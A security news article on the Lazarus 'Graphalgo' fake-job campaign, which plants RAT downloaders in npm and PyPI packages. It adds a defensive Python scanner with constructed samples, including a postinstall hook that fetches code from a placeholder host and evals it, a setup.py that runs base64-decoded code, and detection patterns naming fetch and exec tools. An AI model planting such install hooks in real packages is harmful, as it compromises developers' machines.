Lazarus Targets Developers with Fake Crypto Jobs
North Korea's Lazarus Group is running a large-scale fake recruitment campaign codenamed "Graphalgo" targeting JavaScript and Python developers with cryptocurrency-related coding challenges. Researchers have discovered 192 malicious packages on npm and PyPI that act as downloaders for a remote access trojan (RAT).
Campaign Overview
| Attribute | Details |
|---|---|
| Campaign Name | Graphalgo |
| Threat Actor | Lazarus Group (North Korea) |
| Target | JavaScript and Python developers |
| Malicious Packages | 192 (npm + PyPI) |
| Lure | Cryptocurrency coding challenges and job interviews |
| Payload | RAT with command execution, process listing, file exfiltration |
| Recruitment Platforms | LinkedIn, Facebook, Reddit |
How the Attack Works
Stage 1: Fake Recruitment
Lazarus operates fake blockchain and cryptocurrency companies that post job offerings on LinkedIn, Facebook, and Reddit. Targets receive messages from "recruiters" offering high-paying positions at these companies.
Stage 2: Coding Challenge
Candidates are asked to complete a cryptocurrency-related coding challenge as part of the "interview process." The challenge requires installing specific npm or PyPI packages as dependencies.
Stage 3: Malicious Packages
The required packages contain hidden malware that acts as a downloader for a RAT. Once installed, the packages:
- Execute a postinstall script that runs silently in the background
- Download a second-stage payload from attacker infrastructure
- Install a RAT capable of arbitrary command execution
RAT Capabilities
| Capability | Description |
|---|---|
| Arbitrary command execution | Run any command on the victim's machine |
| Process listing | Enumerate running processes |
| File exfiltration | Search for and steal files |
| Environment discovery | Collect system and network information |
| Persistence | Maintain access across reboots |
Package Statistics
| Registry | Malicious Packages | Total Downloads |
|---|---|---|
| npm | ~120 packages | Thousands |
| PyPI | ~72 packages | Thousands |
| Total | 192 packages | Under investigation |
Packages used names designed to appear legitimate, mimicking popular cryptocurrency and blockchain libraries with slight name variations (typosquatting).
Developer Protection
- Verify package authenticity — Check publisher reputation, download counts, and creation dates before installing
- Audit dependencies — Use `npm audit` and `pip-audit` to scan for known vulnerabilities; both rely on published advisories, so a freshly uploaded malicious package will usually pass until someone reports it
- Use lockfiles — Pin exact package versions with `package-lock.json` and a hash-pinned `requirements.txt` (installed with `pip install --require-hashes`), so a repeat install cannot silently resolve to a different artifact
- Be skeptical of coding challenges requiring unfamiliar packages
- Verify recruiters — Confirm the company and recruiter exist through official channels
- Run challenges in sandboxes — Use containers or VMs for coding challenges from unknown sources
- Monitor for unexpected network activity after installing new packages
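The install-hook check below is an added example, not code from the original article or from the researchers it cites. It ties Stage 3 to the protection list: it inspects an npm `package.json` and a PyPI `setup.py` for the install-time hooks the downloader relies on (a `postinstall` script, or a setuptools `cmdclass` override that runs during `pip install`) and flags commands that fetch, decode or silently run a second stage. The three manifests are constructed samples; the package names and the `example.invalid` host are placeholders, not indicators from the campaign, and the indicator regexes are this example's own heuristics.

```python
import json
import re
import tarfile

# npm lifecycle hooks that execute automatically during `npm install`.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators (assumptions of this example) that an install hook
# fetches, decodes or quietly runs code. List order fixes the label order.
SUSPICIOUS = [
    ("remote fetch", re.compile(r"curl\s|wget\s|https?://|\bfetch\(|axios|urllib|requests\.get")),
    ("inline eval", re.compile(r"\beval\(|new Function\(|\bexec\(|node\s+-e\b|python3?\s+-c\b")),
    ("encoded payload", re.compile(r"base64|atob\(|fromCharCode|\\x[0-9a-fA-F]{2}")),
    ("silenced output", re.compile(r">\s*/dev/null|2>&1|--silent|\bnohup\b")),
    ("spawns process", re.compile(r"child_process|subprocess|os\.system|spawn\(|execSync")),
]

# setuptools lets an sdist replace the `install` (or similar) command with its own
# class, which runs arbitrary Python at `pip install` time.
CMDCLASS_RX = re.compile(r"cmdclass\s*=\s*\{")
HOOK_SUBCLASS_RX = re.compile(r"class\s+\w+\s*\(\s*(?:\w+\.)?(install|develop|egg_info|build_py)\s*\)")


def _indicators(text):
    return [label for label, rx in SUSPICIOUS if rx.search(text)]


def scan_package_json(text):
    """Return one finding per lifecycle hook declared in an npm package.json string."""
    scripts = json.loads(text).get("scripts", {})
    return [
        {"hook": hook, "command": scripts[hook], "indicators": _indicators(scripts[hook])}
        for hook in NPM_LIFECYCLE_HOOKS
        if hook in scripts
    ]


def scan_setup_py(text):
    """Return a finding if a setup.py overrides an install command via cmdclass."""
    if not CMDCLASS_RX.search(text):
        return []
    overridden = sorted(set(HOOK_SUBCLASS_RX.findall(text)))
    if not overridden:
        return []
    return [{"hook": "cmdclass " + ",".join(overridden),
             "command": text.strip(), "indicators": _indicators(text)}]


def scan_npm_tarball(path):
    """Scan the manifest inside a tarball from `npm pack <name>`; nothing is installed or run."""
    with tarfile.open(path) as tar:
        manifest = tar.extractfile("package/package.json").read().decode()
    return scan_package_json(manifest)


def verdict(findings):
    """'block' when a hook carries indicators, 'review' for any hook at all, else 'ok'."""
    if any(f["indicators"] for f in findings):
        return "block"
    return "review" if findings else "ok"


# Constructed sample: a postinstall hook that fetches and eval()s a second stage
# in the background. Package name and host are placeholders.
SAMPLE_PACKAGE_JSON = r'''{
  "name": "coin-price-helper",
  "version": "1.0.3",
  "scripts": {
    "postinstall": "node -e \"require('https').get('https://example.invalid/stage2',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\" >/dev/null 2>&1 &"
  }
}'''

# Constructed sample: a legitimate-looking native module whose hook only rebuilds.
BENIGN_HOOK_JSON = '{"name": "fast-hash", "scripts": {"postinstall": "node-gyp rebuild"}}'

# Constructed sample: no lifecycle hooks at all.
CLEAN_PACKAGE_JSON = '{"name": "tiny-lib", "scripts": {"test": "jest", "build": "tsc"}}'

# Constructed sample: a setup.py that runs a base64-decoded command at install time.
SAMPLE_SETUP_PY = r'''
from setuptools import setup
from setuptools.command.install import install
import base64, subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        subprocess.Popen(["python3", "-c", base64.b64decode("cHJpbnQoJ2hpJyk=")])

setup(name="web3-utils-helper", version="0.1.0", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, findings in (
        ("coin-price-helper", scan_package_json(SAMPLE_PACKAGE_JSON)),
        ("fast-hash", scan_package_json(BENIGN_HOOK_JSON)),
        ("tiny-lib", scan_package_json(CLEAN_PACKAGE_JSON)),
        ("web3-utils-helper", scan_setup_py(SAMPLE_SETUP_PY)),
    ):
        print(f"{label}: {verdict(findings)}")
        for f in findings:
            print(f"  {f['hook']}: {f['indicators'] or 'no indicators'}")
```

Fetch the artifacts without executing anything: `npm pack <name>` writes the tarball that `scan_npm_tarball` reads, and `pip download --no-deps --no-binary :all: <name>` fetches the sdist whose `setup.py` goes to `scan_setup_py`. Installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) removes the postinstall trigger entirely. A `review` verdict is normal for native modules that compile with node-gyp, and string heuristics miss obfuscated or split payloads, so treat the output as triage, not as a substitute for reading the hook in a sandbox.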
Sources
- The Hacker News — Lazarus Campaign Plants Malicious Packages
- BleepingComputer — Fake Recruiters Hide Malware in Coding Challenges
- ReversingLabs — Fake Recruiter Campaign Analysis